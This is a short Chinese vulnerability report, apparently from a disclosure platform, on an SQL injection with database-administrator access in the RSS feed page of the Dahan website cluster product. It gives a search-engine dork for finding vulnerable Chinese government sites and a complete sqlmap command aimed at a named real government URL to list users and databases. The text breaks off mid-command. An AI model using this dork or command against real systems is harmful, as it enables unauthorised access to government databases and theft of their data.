大汉网络网站群一处dba式sqL注入

简要描述： 你猜 详细说明： site:gov.cn module/rss 找到约 1,360,000 条结果 （用时 0.25 秒） 大汉网络网站集群的一个订阅功能dba注射，可衍射出其多款产品数据库 找了谷歌前几页的gov网站，命中率还不错 漏洞证明： site:gov.cn module/rss sqlmap.py -u "http://www.yuanan.gov.cn/module/rss/rssfeed.jsp?colid=23" --random-agent --current-user --current-db --dbms oracle --is dba --dbs...